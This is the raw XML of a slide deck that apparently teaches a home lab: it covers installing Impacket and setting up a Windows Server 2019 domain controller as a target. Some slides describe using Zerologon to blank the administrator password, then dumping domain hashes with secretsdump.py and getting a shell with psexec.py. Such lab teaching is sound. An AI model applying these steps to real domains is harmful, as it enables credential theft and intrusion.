                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ virtualenv --python=python3 impacket</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ source impacket/bin/activate</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ pip install --upgrade pip</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ pip install .</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Impacket will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>be used in our second exploit, the Zerologon exploit. Two python files found in Impacket are required for the exploit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Secretsdump.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Psexec.py.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Secretsdump.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>: This is used to retrieve the password hashes of devices in the domain after exploiting the Zerologon attack and setting the administrator’s password to an empty string.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Psexec.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>: This is used to create a command shell session in the Windows server using the Administrator’s password hash.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2770350" y="1558300"/>
            <a:ext cx="3530400" cy="194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462" name="Google Shape;462;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2806800" y="1757550"/>
            <a:ext cx="3457500" cy="142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sz="2200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Windows Server Setup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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2800"/>
              <a:t>Windows Server 2019 Miscellaneous Config</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="468" name="Google Shape;468;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="559925" y="1019850"/>
            <a:ext cx="3215048" cy="3818849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Google Shape;469;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495875" y="1262200"/>
            <a:ext cx="4284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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>If this screen appears, click “yes” since we want to conduct a pivoting attack later on.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4000250" y="3670025"/>
            <a:ext cx="4366800" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>01</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>. Case Scenario &amp; Network Diagram</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Google Shape;260;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237375" y="4181150"/>
            <a:ext cx="31296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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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2800"/>
              <a:t>Installing Active Directory for Windows Server 2019</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="475" name="Google Shape;475;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="201575" y="960750"/>
            <a:ext cx="8832302" cy="4058216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Google Shape;476;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5619325" y="2814625"/>
            <a:ext cx="3271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b="1" lang="es">
                <a:solidFill>
                  <a:srgbClr val="FF6B65"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Select Add Roles and Features and go though the installation with defaults</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FF6B65"/>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48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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2800"/>
              <a:t>Installing Active Directory for Windows Server 2019</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="482" name="Google Shape;482;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1128175"/>
            <a:ext cx="5368368" cy="3818850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Google Shape;483;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751475" y="1295250"/>
            <a:ext cx="3271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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Upon reaching this page, select Active Directory Domain Services and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>proceed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> to install with the other defaults.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto 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49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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2800"/>
              <a:t>Installing Active Directory for Windows Server 2019</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="489" name="Google Shape;489;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1172250"/>
            <a:ext cx="8839196" cy="2711182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Google Shape;490;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366775" y="4114725"/>
            <a:ext cx="7653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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Once installation is complete, we can then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>prompt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> the server to a domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>controller by clicking on the relevant buttons</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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2800"/>
              <a:t>Installing Active Directory for Windows Server 2019</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="496" name="Google Shape;496;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1172250"/>
            <a:ext cx="5172157" cy="3818849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="Google Shape;497;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751475" y="1295250"/>
            <a:ext cx="3271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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Give the domain a name (e.g. smthg.com)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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2800"/>
              <a:t>Installing Active Directory for Windows Server 2019</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="503" name="Google Shape;503;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1172250"/>
            <a:ext cx="5183885" cy="3818849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="Google Shape;504;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751475" y="1295250"/>
            <a:ext cx="3271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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Configure a password for managing accounts on the domain. In this case we will just give a simple password.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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2800"/>
              <a:t>Installing Active Directory for Windows Server 2019</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="510" name="Google Shape;510;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1172250"/>
            <a:ext cx="5166359" cy="3818850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Google Shape;511;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751475" y="1295250"/>
            <a:ext cx="3271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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Check the NetBIOS domain name and proceed with the default options to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>promote the server to a Domain Controller.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256625" y="226025"/>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Network Configuration for Windows Server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="517" name="Google Shape;517;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="179525" y="1019850"/>
            <a:ext cx="4988201" cy="2157725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Google Shape;518;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795400" y="3597150"/>
            <a:ext cx="3271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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This it the network configuration for the host-only ethernet interface on the Server after the DC is installed.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="519" name="Google Shape;519;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5831700" y="832629"/>
            <a:ext cx="2651225" cy="3249325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="Google Shape;520;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452475" y="4168075"/>
            <a:ext cx="3271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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
